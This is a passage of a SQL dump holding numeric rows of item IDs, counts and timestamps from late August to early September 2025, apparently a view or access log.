02:09:32'),(90184,5573,1,'2025-08-26','2025-08-26 02:15:21'),(90185,5573,1,'2025-08-26','2025-08-26 02:30:29'),(90186,5522,1,'2025-08-26','2025-08-26 02:53:25'),(90187,470,1,'2025-08-26','2025-08-26 03:01:37'),(90188,87,1,'2025-08-26','2025-08-26 03:09:44'),(90189,4866,1,'2025-08-26','2025-08-26 05:42:47'),(90190,4950,1,'2025-08-26','2025-08-26 08:26:31'),(90191,68,1,'2025-08-26','2025-08-26 08:45:19'),(90192,80,1,'2025-08-26','2025-08-26 08:46:04'),(90193,5363,1,'2025-08-26','2025-08-26 10:00:49'),(90194,84,1,'2025-08-26','2025-08-26 10:46:14'),(90195,5397,1,'2025-08-26','2025-08-26 12:13:56'),(90196,3781,1,'2025-08-26','2025-08-26 12:20:40'),(90197,4966,1,'2025-08-26','2025-08-26 12:31:30'),(90198,80,1,'2025-08-26','2025-08-26 12:32:24'),(90199,4950,1,'2025-08-26','2025-08-26 12:36:50'),(90200,5406,1,'2025-08-26','2025-08-26 12:38:56'),(90201,4827,1,'2025-08-26','2025-08-26 13:15:32'),(90202,5526,1,'2025-08-26','2025-08-26 14:02:50'),(90203,5433,1,'2025-08-26','2025-08-26 14:22:11'),(90204,1728,1,'2025-08-26','2025-08-26 14:38:55'),(90205,1724,1,'2025-08-26','2025-08-26 14:38:55'),(90206,5461,1,'2025-08-26','2025-08-26 16:02:59'),(90207,2956,1,'2025-08-26','2025-08-26 16:38:02'),(90208,3781,1,'2025-08-26','2025-08-26 16:52:50'),(90209,3060,1,'2025-08-26','2025-08-26 17:03:58'),(90210,5573,1,'2025-08-26','2025-08-26 18:04:04'),(90211,4612,1,'2025-08-26','2025-08-26 18:31:56'),(90212,1586,1,'2025-08-26','2025-08-26 20:23:15'),(90213,2395,1,'2025-08-26','2025-08-26 21:12:25'),(90214,5425,1,'2025-08-26','2025-08-26 23:16:59'),(90215,1718,1,'2025-08-26','2025-08-26 23:21:45'),(90216,5484,1,'2025-08-27','2025-08-27 00:45:25'),(90217,91,1,'2025-08-27','2025-08-27 01:39:03'),(90218,5530,1,'2025-08-27','2025-08-27 03:57:02'),(90219,4835,1,'2025-08-27','2025-08-27 04:37:07'),(90220,3267,1,'2025-08-27','2025-08-27 06:07:03'),(90221,3267,1,'2025-08-27','2025-08-27 06:22:50'),(90222,4888,1,'2025-08-27','2025-08-27 06:54:55'),(90223,4888,1,'2025-08-27','2025-08-27 06:57:24'),(90224,4888,1,'2025-08-27','2025-08-27 07:00:40'),(90225,4888,1,'2025-08-27','2025-08-27 07:10:17'),(90226,5276,1,'2025-08-27','2025-08-27 07:38:03'),(90227,4950,1,'2025-08-27','2025-08-27 08:11:46'),(90228,4950,1,'2025-08-27','2025-08-27 10:26:49'),(90229,2658,1,'2025-08-27','2025-08-27 10:34:13'),(90230,4587,1,'2025-08-27','2025-08-27 12:07:51'),(90231,4420,1,'2025-08-27','2025-08-27 12:34:19'),(90232,4950,1,'2025-08-27','2025-08-27 12:41:02'),(90233,1730,1,'2025-08-27','2025-08-27 12:50:42'),(90234,4612,1,'2025-08-27','2025-08-27 13:18:24'),(90235,4651,1,'2025-08-27','2025-08-27 13:19:47'),(90236,5512,1,'2025-08-27','2025-08-27 13:29:35'),(90237,471,1,'2025-08-27','2025-08-27 13:57:15'),(90238,1701,1,'2025-08-27','2025-08-27 14:08:20'),(90239,4301,1,'2025-08-27','2025-08-27 14:44:16'),(90240,5054,1,'2025-08-27','2025-08-27 15:04:51'),(90241,5578,1,'2025-08-27','2025-08-27 15:13:17'),(90242,4830,1,'2025-08-27','2025-08-27 15:20:14'),(90243,4966,1,'2025-08-27','2025-08-27 16:24:45'),(90244,5549,1,'2025-08-27','2025-08-27 16:54:21'),(90245,4950,1,'2025-08-27','2025-08-27 17:51:38'),(90246,4950,1,'2025-08-27','2025-08-27 18:08:49'),(90247,1745,1,'2025-08-27','2025-08-27 18:20:21'),(90248,72,1,'2025-08-27','2025-08-27 18:21:22'),(90249,4635,1,'2025-08-27','2025-08-27 18:22:35'),(90250,4612,1,'2025-08-27','2025-08-27 18:55:58'),(90251,5567,1,'2025-08-27','2025-08-27 21:15:06'),(90252,5530,1,'2025-08-27','2025-08-27 22:34:48'),(90253,5593,1,'2025-08-27','2025-08-27 23:29:46'),(90254,5582,1,'2025-08-27','2025-08-27 23:35:03'),(90255,4966,1,'2025-08-27','2025-08-27 23:42:24'),(90256,5573,1,'2025-08-27','2025-08-27 23:44:47'),(90257,4950,1,'2025-08-27','2025-08-27 23:55:23'),(90258,5397,1,'2025-08-28','2025-08-28 00:28:24'),(90259,1586,1,'2025-08-28','2025-08-28 00:28:44'),(90260,4950,1,'2025-08-28','2025-08-28 00:53:22'),(90261,4950,1,'2025-08-28','2025-08-28 00:53:47'),(90262,4950,1,'2025-08-28','2025-08-28 00:53:48'),(90263,470,1,'2025-08-28','2025-08-28 00:59:37'),(90264,5567,1,'2025-08-28','2025-08-28 01:49:53'),(90265,5570,1,'2025-08-28','2025-08-28 01:54:05'),(90266,4444,1,'2025-08-28','2025-08-28 01:58:43'),(90267,5461,1,'2025-08-28','2025-08-28 01:58:48'),(90268,91,1,'2025-08-28','2025-08-28 02:00:32'),(90269,5578,1,'2025-08-28','2025-08-28 02:21:05'),(90270,3781,1,'2025-08-28','2025-08-28 02:22:45'),(90271,5593,1,'2025-08-28','2025-08-28 02:24:49'),(90272,5585,1,'2025-08-28','2025-08-28 02:48:46'),(90273,5397,1,'2025-08-28','2025-08-28 03:51:09'),(90274,3282,1,'2025-08-28','2025-08-28 03:59:48'),(90275,5582,1,'2025-08-28','2025-08-28 04:16:06'),(90276,5585,1,'2025-08-28','2025-08-28 04:20:46'),(90277,5512,1,'2025-08-28','2025-08-28 04:25:44'),(90278,5567,1,'2025-08-28','2025-08-28 04:36:48'),(90279,5484,1,'2025-08-28','2025-08-28 04:55:33'),(90280,5502,1,'2025-08-28','2025-08-28 04:56:20'),(90281,5561,1,'2025-08-28','2025-08-28 04:56:37'),(90282,5499,1,'2025-08-28','2025-08-28 04:58:45'),(90283,5131,1,'2025-08-28','2025-08-28 05:06:16'),(90284,3710,1,'2025-08-28','2025-08-28 05:52:56'),(90285,5593,1,'2025-08-28','2025-08-28 05:54:27'),(90286,5515,1,'2025-08-28','2025-08-28 06:11:18'),(90287,3714,1,'2025-08-28','2025-08-28 06:48:47'),(90288,5499,1,'2025-08-28','2025-08-28 06:49:04'),(90289,5593,1,'2025-08-28','2025-08-28 07:07:09'),(90290,5593,1,'2025-08-28','2025-08-28 07:37:17'),(90291,3083,1,'2025-08-28','2025-08-28 08:25:53'),(90292,4950,1,'2025-08-28','2025-08-28 08:31:55'),(90293,5067,1,'2025-08-28','2025-08-28 08:34:13'),(90294,3055,1,'2025-08-28','2025-08-28 09:05:47'),(90295,5578,1,'2025-08-28','2025-08-28 09:27:27'),(90296,4980,1,'2025-08-28','2025-08-28 09:44:16'),(90297,5406,1,'2025-08-28','2025-08-28 10:04:33'),(90298,5573,1,'2025-08-28','2025-08-28 10:17:38'),(90299,5522,1,'2025-08-28','2025-08-28 10:47:05'),(90300,5582,1,'2025-08-28','2025-08-28 11:18:16'),(90301,4950,1,'2025-08-28','2025-08-28 12:24:13'),(90302,3180,1,'2025-08-28','2025-08-28 12:34:01'),(90303,110,1,'2025-08-28','2025-08-28 12:58:39'),(90304,1745,1,'2025-08-28','2025-08-28 13:19:49'),(90305,474,1,'2025-08-28','2025-08-28 13:33:57'),(90306,5585,1,'2025-08-28','2025-08-28 14:09:39'),(90307,5588,1,'2025-08-28','2025-08-28 14:32:06'),(90308,5588,1,'2025-08-28','2025-08-28 14:33:04'),(90309,1604,1,'2025-08-28','2025-08-28 14:35:09'),(90310,84,1,'2025-08-28','2025-08-28 14:40:17'),(90311,5588,1,'2025-08-28','2025-08-28 14:48:17'),(90312,5433,1,'2025-08-28','2025-08-28 14:50:43'),(90313,3051,1,'2025-08-28','2025-08-28 14:50:43'),(90314,1705,1,'2025-08-28','2025-08-28 15:01:54'),(90315,3006,1,'2025-08-28','2025-08-28 16:19:55'),(90316,5397,1,'2025-08-28','2025-08-28 16:20:26'),(90317,469,1,'2025-08-28','2025-08-28 17:03:54'),(90318,1604,1,'2025-08-28','2025-08-28 17:22:12'),(90319,5454,1,'2025-08-28','2025-08-28 17:40:14'),(90320,2813,1,'2025-08-28','2025-08-28 18:01:58'),(90321,1703,1,'2025-08-28','2025-08-28 18:55:47'),(90322,2993,1,'2025-08-28','2025-08-28 19:23:43'),(90323,4960,1,'2025-08-28','2025-08-28 19:48:30'),(90324,2775,1,'2025-08-28','2025-08-28 19:59:26'),(90325,5512,1,'2025-08-28','2025-08-28 20:29:04'),(90326,3781,1,'2025-08-28','2025-08-28 20:54:47'),(90327,5567,1,'2025-08-28','2025-08-28 21:23:50'),(90328,5259,1,'2025-08-28','2025-08-28 21:48:57'),(90329,108,1,'2025-08-28','2025-08-28 21:49:10'),(90330,469,1,'2025-08-28','2025-08-28 21:59:00'),(90331,5502,1,'2025-08-28','2025-08-28 22:08:21'),(90332,91,1,'2025-08-28','2025-08-28 22:12:13'),(90333,5585,1,'2025-08-28','2025-08-28 22:28:18'),(90334,474,1,'2025-08-28','2025-08-28 23:01:38'),(90335,1584,1,'2025-08-28','2025-08-28 23:06:13'),(90336,5420,1,'2025-08-28','2025-08-28 23:32:13'),(90337,474,1,'2025-08-28','2025-08-28 23:58:56'),(90338,68,1,'2025-08-29','2025-08-29 00:01:19'),(90339,80,1,'2025-08-29','2025-08-29 00:01:24'),(90340,5461,1,'2025-08-29','2025-08-29 00:11:35'),(90341,5549,1,'2025-08-29','2025-08-29 00:13:46'),(90342,4797,1,'2025-08-29','2025-08-29 00:18:22'),(90343,5449,1,'2025-08-29','2025-08-29 00:26:43'),(90344,80,1,'2025-08-29','2025-08-29 01:19:32'),(90345,91,1,'2025-08-29','2025-08-29 02:11:58'),(90346,5346,1,'2025-08-29','2025-08-29 02:39:56'),(90347,5062,1,'2025-08-29','2025-08-29 05:05:15'),(90348,5484,1,'2025-08-29','2025-08-29 05:23:51'),(90349,5125,1,'2025-08-29','2025-08-29 07:21:30'),(90350,474,1,'2025-08-29','2025-08-29 08:06:18'),(90351,5334,1,'2025-08-29','2025-08-29 09:02:23'),(90352,4950,1,'2025-08-29','2025-08-29 09:48:17'),(90353,335,1,'2025-08-29','2025-08-29 09:50:14'),(90354,4950,1,'2025-08-29','2025-08-29 10:12:18'),(90355,84,1,'2025-08-29','2025-08-29 10:15:19'),(90356,5567,1,'2025-08-29','2025-08-29 10:59:49'),(90357,2704,1,'2025-08-29','2025-08-29 11:34:01'),(90358,2410,1,'2025-08-29','2025-08-29 13:21:25'),(90359,84,1,'2025-08-29','2025-08-29 13:27:41'),(90360,87,1,'2025-08-29','2025-08-29 13:27:44'),(90361,89,1,'2025-08-29','2025-08-29 13:27:47'),(90362,4930,1,'2025-08-29','2025-08-29 13:27:50'),(90363,5502,1,'2025-08-29','2025-08-29 13:39:16'),(90364,5383,1,'2025-08-29','2025-08-29 14:33:00'),(90365,5598,1,'2025-08-29','2025-08-29 14:44:59'),(90366,3006,1,'2025-08-29','2025-08-29 15:04:09'),(90367,4944,1,'2025-08-29','2025-08-29 15:29:12'),(90368,4878,1,'2025-08-29','2025-08-29 15:30:10'),(90369,91,1,'2025-08-29','2025-08-29 15:30:40'),(90370,80,1,'2025-08-29','2025-08-29 15:34:54'),(90371,74,1,'2025-08-29','2025-08-29 15:59:09'),(90372,4988,1,'2025-08-29','2025-08-29 16:01:32'),(90373,5101,1,'2025-08-29','2025-08-29 16:13:27'),(90374,5601,1,'2025-08-29','2025-08-29 16:17:51'),(90375,5598,1,'2025-08-29','2025-08-29 16:17:51'),(90376,5601,1,'2025-08-29','2025-08-29 16:25:49'),(90377,4639,1,'2025-08-29','2025-08-29 17:00:13'),(90378,5441,1,'2025-08-29','2025-08-29 17:09:22'),(90379,5598,1,'2025-08-29','2025-08-29 17:11:22'),(90380,3735,1,'2025-08-29','2025-08-29 17:12:56'),(90381,5248,1,'2025-08-29','2025-08-29 17:12:58'),(90382,5598,1,'2025-08-29','2025-08-29 17:15:12'),(90383,4888,1,'2025-08-29','2025-08-29 17:18:15'),(90384,3781,1,'2025-08-29','2025-08-29 17:23:51'),(90385,4722,1,'2025-08-29','2025-08-29 19:26:02'),(90386,4719,1,'2025-08-29','2025-08-29 19:31:53'),(90387,74,1,'2025-08-29','2025-08-29 19:40:11'),(90388,5601,1,'2025-08-29','2025-08-29 20:07:55'),(90389,481,1,'2025-08-29','2025-08-29 22:14:51'),(90390,5526,1,'2025-08-29','2025-08-29 22:18:55'),(90391,4420,1,'2025-08-29','2025-08-29 22:34:53'),(90392,84,1,'2025-08-29','2025-08-29 22:59:14'),(90393,1877,1,'2025-08-29','2025-08-29 23:07:10'),(90394,1872,1,'2025-08-29','2025-08-29 23:10:07'),(90395,1870,1,'2025-08-29','2025-08-29 23:17:57'),(90396,72,1,'2025-08-29','2025-08-29 23:21:20'),(90397,84,1,'2025-08-29','2025-08-29 23:25:33'),(90398,3694,1,'2025-08-29','2025-08-29 23:26:05'),(90399,84,1,'2025-08-29','2025-08-29 23:38:22'),(90400,3691,1,'2025-08-29','2025-08-29 23:38:30'),(90401,3664,1,'2025-08-29','2025-08-29 23:47:46'),(90402,84,1,'2025-08-29','2025-08-29 23:58:21'),(90403,5549,1,'2025-08-30','2025-08-30 00:58:01'),(90404,91,1,'2025-08-30','2025-08-30 02:14:10'),(90405,4420,1,'2025-08-30','2025-08-30 02:33:02'),(90406,4637,1,'2025-08-30','2025-08-30 02:41:40'),(90407,91,1,'2025-08-30','2025-08-30 03:03:08'),(90408,1728,1,'2025-08-30','2025-08-30 05:01:35'),(90409,4457,1,'2025-08-30','2025-08-30 08:02:08'),(90410,84,1,'2025-08-30','2025-08-30 09:19:42'),(90411,5042,1,'2025-08-30','2025-08-30 09:49:51'),(90412,2658,1,'2025-08-30','2025-08-30 10:15:30'),(90413,4412,1,'2025-08-30','2025-08-30 10:29:02'),(90414,483,1,'2025-08-30','2025-08-30 10:33:22'),(90415,4893,1,'2025-08-30','2025-08-30 11:08:44'),(90416,2813,1,'2025-08-30','2025-08-30 11:20:23'),(90417,4983,1,'2025-08-30','2025-08-30 12:15:39'),(90418,3083,1,'2025-08-30','2025-08-30 12:54:19'),(90419,4674,1,'2025-08-30','2025-08-30 13:09:39'),(90420,4966,1,'2025-08-30','2025-08-30 15:06:19'),(90421,3275,1,'2025-08-30','2025-08-30 16:03:59'),(90422,5415,1,'2025-08-30','2025-08-30 16:43:04'),(90423,3096,1,'2025-08-30','2025-08-30 16:47:02'),(90424,5454,1,'2025-08-30','2025-08-30 17:33:56'),(90425,4893,1,'2025-08-30','2025-08-30 17:44:59'),(90426,2658,1,'2025-08-30','2025-08-30 19:00:04'),(90427,5383,1,'2025-08-30','2025-08-30 19:35:50'),(90428,4950,1,'2025-08-30','2025-08-30 19:46:01'),(90429,1726,1,'2025-08-30','2025-08-30 20:07:00'),(90430,5268,1,'2025-08-30','2025-08-30 20:23:00'),(90431,1614,1,'2025-08-30','2025-08-30 21:24:43'),(90432,3087,1,'2025-08-30','2025-08-30 21:46:59'),(90433,4950,1,'2025-08-30','2025-08-30 23:39:25'),(90434,3781,1,'2025-08-31','2025-08-31 00:06:06'),(90435,84,1,'2025-08-31','2025-08-31 02:29:06'),(90436,5573,1,'2025-08-31','2025-08-31 03:00:05'),(90437,91,1,'2025-08-31','2025-08-31 03:17:43'),(90438,5415,1,'2025-08-31','2025-08-31 05:03:18'),(90439,1582,1,'2025-08-31','2025-08-31 05:49:47'),(90440,5484,1,'2025-08-31','2025-08-31 08:01:23'),(90441,3097,1,'2025-08-31','2025-08-31 08:03:51'),(90442,5567,1,'2025-08-31','2025-08-31 08:10:24'),(90443,5561,1,'2025-08-31','2025-08-31 08:12:28'),(90444,5140,1,'2025-08-31','2025-08-31 08:31:07'),(90445,5140,1,'2025-08-31','2025-08-31 09:16:56'),(90446,84,1,'2025-08-31','2025-08-31 10:29:15'),(90447,1598,1,'2025-08-31','2025-08-31 11:22:31'),(90448,5461,1,'2025-08-31','2025-08-31 11:56:07'),(90449,84,1,'2025-08-31','2025-08-31 13:04:35'),(90450,4870,1,'2025-08-31','2025-08-31 16:40:36'),(90451,4930,1,'2025-08-31','2025-08-31 19:22:25'),(90452,91,1,'2025-08-31','2025-08-31 19:22:56'),(90453,72,1,'2025-08-31','2025-08-31 19:25:26'),(90454,1612,1,'2025-08-31','2025-08-31 19:34:12'),(90455,3083,1,'2025-08-31','2025-08-31 21:59:14'),(90456,3069,1,'2025-08-31','2025-08-31 23:10:58'),(90457,5412,1,'2025-08-31','2025-08-31 23:31:52'),(90458,3781,1,'2025-08-31','2025-08-31 23:58:11'),(90459,5356,1,'2025-09-01','2025-09-01 00:43:09'),(90460,1582,1,'2025-09-01','2025-09-01 01:19:05'),(90461,1582,1,'2025-09-01','2025-09-01 01:19:49'),(90462,5545,1,'2025-09-01','2025-09-01 02:16:12'),(90463,5492,1,'2025-09-01','2025-09-01 04:00:09'),(90464,91,1,'2025-09-01','2025-09-01 04:15:51'),(90465,5441,1,'2025-09-01','2025-09-01 04:26:21'),(90466,4520,1,'2025-09-01','2025-09-01 04:28:11'),(90467,89,1,'2025-09-01','2025-09-01 05:00:41'),(90468,3056,1,'2025-09-01','2025-09-01 05:31:08'),(90469,1590,1,'2025-09-01','2025-09-01 07:06:17'),(90470,2178,1,'2025-09-01','2025-09-01 07:50:13'),(90471,4404,1,'2025-09-01','2025-09-01 07:52:11'),(90472,4400,1,'2025-09-01','2025-09-01 07:53:13'),(90473,4950,1,'2025-09-01','2025-09-01 08:10:25'),(90474,3781,1,'2025-09-01','2025-09-01 09:29:24'),(90475,5598,1,'2025-09-01','2025-09-01 11:41:08'),(90476,5593,1,'2025-09-01','2025-09-01 12:10:32'),(90477,72,1,'2025-09-01','2025-09-01 12:26:37'),(90478,1582,1,'2025-09-01','2025-09-01 12:54:54'),(90479,5467,1,'2025-09-01','2025-09-01 14:04:02'),(90480,91,1,'2025-09-01','2025-09-01 14:34:55'),(90481,4556,1,'2025-09-01','2025-09-01 14:35:52'),(90482,2813,1,'2025-09-01','2025-09-01 14:45:00'),(90483,4612,1,'2025-09-01','2025-09-01 15:07:20'),(90484,335,1,'2025-09-01','2025-09-01 15:08:39'),(90485,87,1,'2025-09-01','2025-09-01 15:09:40'),(90486,5598,1,'2025-09-01','2025-09-01 15:11:57'),(90487,91,1,'2025-09-01','2025-09-01 15:13:07'),(90488,5605,1,'2025-09-01','2025-09-01 15:14:27'),(90489,91,1,'2025-09-01','2025-09-01 15:17:17'),(90490,5567,1,'2025-09-01','2025-09-01 16:20:19'),(90491,4608,1,'2025-09-01','2025-09-01 16:21:45'),(90492,68,1,'2025-09-01','2025-09-01 17:05:16'),(90493,91,1,'2025-09-01','2025-09-01 17:05:28'),(90494,5549,1,'2025-09-01','2025-09-01 19:30:35'),(90495,87,1,'2025-09-01','2025-09-01 21:02:44'),(90496,68,1,'2025-09-02','2025-09-02 00:10:25'),(90497,4950,1,'2025-09-02','2025-09-02 02:00:02'),(90498,91,1,'2025-09-02','2025-09-02 02:09:58'),(90499,91,1,'2025-09-02','2025-09-02 05:14:14'),(90500,3261,1,'2025-09-02','2025-09-02 06:08:29'),(90501,1703,1,'2025-09-02','2025-09-02 07:37:13'),(90502,3102,1,'2025-09-02','2025-09-02 07:53:14'),(90503,5163,1,'2025-09-02','2025-09-02 10:35:09'),(90504,1600,1,'2025-09-02','2025-09-02 10:49:42'),(90505,1745,1,'2025-09-02','2025-09-02 11:15:26'),(90506,4977,1,'2025-09-02','2025-09-02 11:56:40'),(90507,4950,1,'2025-09-02','2025-09-02 13:38:12'),(90508,2813,1,'2025-09-02','2025-09-02 13:45:51'),(90509,3087,1,'2025-09-02','2025-09-02 14:19:57'),(90510,2419,1,'2025-09-02','2025-09-02 15:10:08'),(90511,5400,1,'2025-09-02','2025-09-02 16:08:48'),(90512,5605,1,'2025-09-02','2025-09-02 16:18:32'),(90513,1745,1,'2025-09-02','2025-09-02 16:39:43'),(90514,5461,1,'2025-09-02','2025-09-02 16:52:02'),(90515,4950,1,'2025-09-02','2025-09-02 16:53:41'),(90516,4950,1,'2025-09-02','2025-09-02 17:09:46'),(90517,4893,1,'2025-09-02','2025-09-02 17:17:27'),(90518,76,1,'2025-09-02','2025-09-02 17:23:14'),(90519,1584,1,'2025-09-02','2025-09-02 19:37:08'),(90520,1608,1,'2025-09-02','2025-09-02 20:12:13'),(90521,1604,1,'2025-09-02','2025-09-02 20:26:38'),(90522,1584,1,'2025-09-02','2025-09-02 20:52:37'),(90523,4893,1,'2025-09-02','2025-09-02 21:05:32'),(90524,2813,1,'2025-09-02','2025-09-02 21:12:54'),(90525,4950,1,'2025-09-02','2025-09-02 21:15:33'),(90526,87,1,'2025-09-02','2025-09-02 21:52:46'),(90527,3006,1,'2025-09-02','2025-09-02 22:55:49'),(90528,76,1,'2025-09-03','2025-09-03 00:21:28'),(90529,5415,1,'2025-09-03','2025-09-03 00:27:44'),(90530,2804,1,'2025-09-03','2025-09-03 00:44:05'),(90531,91,1,'2025-09-03','2025-09-03 03:17:06'),(90532,5598,1,'2025-09-03','2025-09-03 03:23:24'),(90533,5598,1,'2025-09-03','2025-09-03 03:25:05'),(90534,2704,1,'2025-09-03','2025-09-03 04:25:51'),(90535,5567,1,'2025-09-03','2025-09-03 04:55:55'),(90536,91,1,'2025-09-03','2025-09-03 05:18:31'),(90537,3285,1,'2025-09-03','2025-09-03 06:18:27'),(90538,5449,1,'2025-09-03','2025-09-03 06:31:01'),(90539,4424,1,'2025-09-03','2025-09-03 06:34:00'),(90540,4950,1,'2025-09-03','2025-09-03 08:27:20'),(90541,80,1,'2025-09-03','2025-09-03 08:27:50'),(90542,1544,1,'2025-09-03','2025-09-03 09:24:44'),(90543,84,1,'2025-09-03','2025-09-03 09:52:44'),(90544,5522,1,'2025-09-03','2025-09-03 10:49:32'),(90545,5601,1,'2025-09-03','2025-09-03 11:39:27'),(90546,5484,1,'2025-09-03','2025-09-03 12:29:50'),(90547,487,1,'2025-09-03','2025-09-03 12:53:10'),(90548,486,1,'2025-09-03','2025-09-03 12:53:36'),(90549,87,1,'2025-09-03','2025-09-03 12:56:03'),(90550,87,1,'2025-09-03','2025-09-03 12:56:12'),(90551,486,1,'2025-09-03','2025-09-03 12:56:58'),(90552,486,1,'2025-09-03','2025-09-03 12:57:09'),(90553,91,1,'2025-09-03','2025-09-03 12:57:27'),(90554,5383,1,'2025-09-03','2025-09-03 12:58:24'),(90555,91,1,'2025-09-03','2025-09-03 13:00:07'),(90556,5363,1,'2025-09-03','2025-09-03 13:00:34'),(90557,5363,1,'2025-09-03','2025-09-03 13:00:35'),(90558,5248,1,'2025-09-03','2025-09-03 13:12:00'),(90559,5248,1,'2025-09-03','2025-09-03 13:12:01'),(90560,5409,1,'2025-09-03','2025-09-03 13:33:27'),(90561,4950,1,'2025-09-03','2025-09-03 15:02:33'),(90562,4950,1,'2025-09-03','2025-09-03 15:03:49'),(90563,4738,1,'2025-09-03','2025-09-03 15:06:22'),(90564,3781,1,'2025-09-03','2025-09-03 15:35:00'),(90565,4960,1,'2025-09-03','2025-09-03 15:35:58'),(90566,5449,1,'2025-09-03','2025-09-03 16:36:44'),(90567,3781,1,'2025-09-03','2025-09-03 16:49:49'),(90568,3706,1,'2025-09-03','2025-09-03 17:01:53'),(90569,5397,1,'2025-09-03','2025-09-03 18:24:09'),(90570,5449,1,'2025-09-03','2025-09-03 19:04:53'),(90571,4960,1,'2025-09-03','2025-09-03 20:07:06'),(90572,5507,1,'2025-09-03','2025-09-03 20:22:04'),(90573,5593,1,'2025-09-03','2025-09-03 22:16:06'),(90574,4950,1,'2025-09-03','2025-09-03 22:41:54'),(90575,4944,1,'2025-09-03','2025-09-03 23:55:28'),(90576,5457,1,'2025-09-04','2025-09-04 00:13:51'),(90577,5397,1,'2025-09-04','2025-09-04 00:16:31'),(90578,4950,1,'2025-09-04','2025-09-04 00:30:04'),(90579,4950,1,'2025-09-04','2025-09-04 02:09:42'),(90580,4950,1,'2025-09-04','2025-09-04 02:09:56'),(90581,1608,1,'2025-09-04','2025-09-04 03:16:19'),(90582,1584,1,'2025-09-04','2025-09-04 03:21:06'),(90583,2813,1,'2025-09-04','2025-09-04 03:22:55'),(90584,2297,1,'2025-09-04','2025-09-04 05:04:01'),(90585,3781,1,'2025-09-04','2025-09-04 05:04:10'),(90586,91,1,'2025-09-04','2025-09-04 05:22:16'),(90587,4400,1,'2025-09-04','2025-09-04 06:12:19'),(90588,74,1,'2025-09-04','2025-09-04 06:52:04'),(90589,5441,1,'2025-09-04','2025-09-04 07:14:42'),(90590,72,1,'2025-09-04','2025-09-04 07:32:00'),(90591,1608,1,'2025-09-04','2025-09-04 07:32:39'),(90592,4966,1,'2025-09-04','2025-09-04 07:32:49'),(90593,84,1,'2025-09-04','2025-09-04 07:56:59'),(90594,1877,1,'2025-09-04','2025-09-04 07:59:07'),(90595,84,1,'2025-09-04','2025-09-04 08:01:23'),(90596,1584,1,'2025-09-04','2025-09-04 08:36:25'),(90597,2813,1,'2025-09-04','2025-09-04 08:43:29'),(90598,5433,1,'2025-09-04','2025-09-04 10:07:00'),(90599,4950,1,'2025-09-04','2025-09-04 10:16:16'),(90600,68,1,'2025-09-04','2025-09-04 10:16:38'),(90601,68,1,'2025-09-04','2025-09-04 10:16:44'),(90602,4893,1,'2025-09-04','2025-09-04 10:37:20'),(90603,1584,1,'2025-09-04','2025-09-04 11:22:42'),(90604,5461,1,'2025-09-04','2025-09-04 13:16:28'),(90605,5461,1,'2025-09-04','2025-09-04 13:16:30'),(90606,5472,1,'2025-09-04','2025-09-04 13:16:41'),(90607,5472,1,'2025-09-04','2025-09-04 13:16:43'),(90608,4950,1,'2025-09-04','2025-09-04 14:32:38'),(90609,4301,1,'2025-09-04','2025-09-04 14:39:13'),(90610,5598,1,'2025-09-04','2025-09-04 14:53:40'),(90611,5512,1,'2025-09-04','2025-09-04 15:15:37'),(90612,2395,1,'2025-09-04','2025-09-04 15:51:29'),(90613,4950,1,'2025-09-04','2025-09-04 16:20:32'),(90614,2165,1,'2025-09-04','2025-09-04 17:39:24'),(90615,84,1,'2025-09-04','2025-09-04 18:09:34'),(90616,5457,1,'2025-09-04','2025-09-04 18:51:31'),(90617,467,1,'2025-09-04','2025-09-04 20:39:39'),(90618,5585,1,'2025-09-04','2025-09-04 20:52:27'),(90619,3102,1,'2025-09-04','2025-09-04 21:00:33'),(90620,5573,1,'2025-09-04','2025-09-04 22:52:32'),(90621,5461,1,'2025-09-04','2025-09-04 22:52:35'),(90622,4950,1,'2025-09-04','2025-09-04 23:33:54'),(90623,1586,1,'2025-09-05','2025-09-05 01:41:32'),(90624,1718,1,'2025-09-05','2025-09-05 02:35:40'),(90625,1782,1,'2025-09-05','2025-09-05 03:37:40'),(90626,1701,1,'2025-09-05','2025-09-05 04:03:18'),(90627,5598,1,'2025-09-05','2025-09-05 04:04:53'),(90628,3278,1,'2025-09-05','2025-09-05 04:22:16'),(90629,91,1,'2025-09-05','2025-09-05 05:25:15'),(90630,5457,1,'2025-09-05','2025-09-05 05:34:29'),(90631,2993,1,'2025-09-05','2025-09-05 06:54:27'),(90632,5567,1,'2025-09-05','2025-09-05 07:18:30'),(90633,472,1,'2025-09-05','2025-09-05 07:42:21'),(90634,5567,1,'2025-09-05','2025-09-05 07:49:27'),(90635,3083,1,'2025-09-05','2025-09-05 08:00:34'),(90636,5549,1,'2025-09-05','2025-09-05 08:24:27'),(90637,3781,1,'2025-09-05','2025-09-05 08:27:08'),(90638,4950,1,'2025-09-05','2025-09-05 10:23:00'),(90639,4950,1,'2025-09-05','2025-09-05 11:46:31'),(90640,4930,1,'2025-09-05','2025-09-05 11:50:27'),(90641,3781,1,'2025-09-05','2025-09-05 12:26:11'),(90642,5526,1,'2025-09-05','2025-09-05 13:18:42'),(90643,4944,1,'2025-09-05','2025-09-05 13:49:52'),(90644,2751,1,'2025-09-05','2025-09-05 14:10:47'),(90645,5561,1,'2025-09-05','2025-09-05 14:26:59'),(90646,3691,1,'2025-09-05','2025-09-05 15:00:54'),(90647,2411,1,'2025-09-05','2025-09-05 15:33:47'),(90648,5334,1,'2025-09-05','2025-09-05 15:37:18'),(90649,5334,1,'2025-09-05','2025-09-05 15:42:53'),(90650,2395,1,'2025-09-05','2025-09-05 15:45:46'),(90651,4950,1,'2025-09-05','2025-09-05 16:20:01'),(90652,5484,1,'2025-09-05','2025-09-05 16:59:52'),(90653,1604,1,'2025-09-05','2025-09-05 17:37:06'),(90654,1604,1,'2025-09-05','2025-09-05 17:37:08'),(90655,1604,1,'2025-09-05','2025-09-05 17:37:51'),(90656,5363,1,'2025-09-05','2025-09-05 17:39:11'),(90657,1582,1,'2025-09-05','2025-09-05 19:14:17'),(90658,2813,1,'2025-09-05','2025-09-05 19:30:29'),(90659,4573,1,'2025-09-05','2025-09-05 20:30:54'),(90660,3781,1,'2025-09-05','2025-09-05 21:30:51'),(90661,5415,1,'2025-09-05','2025-09-05 21:37:58'),(90662,3781,1,'2025-09-06','2025-09-06 00:11:53'),(90663,80,1,'2025-09-06','2025-09-06 01:20:29'),(90664,5467,1,'2025-09-06','2025-09-06 02:53:36'),(90665,5578,1,'2025-09-06','2025-09-06 04:46:10'),(90666,5128,1,'2025-09-06','2025-09-06 05:06:09'),(90667,3006,1,'2025-09-06','2025-09-06 05:16:19'),(90668,5421,1,'2025-09-06','2025-09-06 05:21:18'),(90669,5346,1,'2025-09-06','2025-09-06 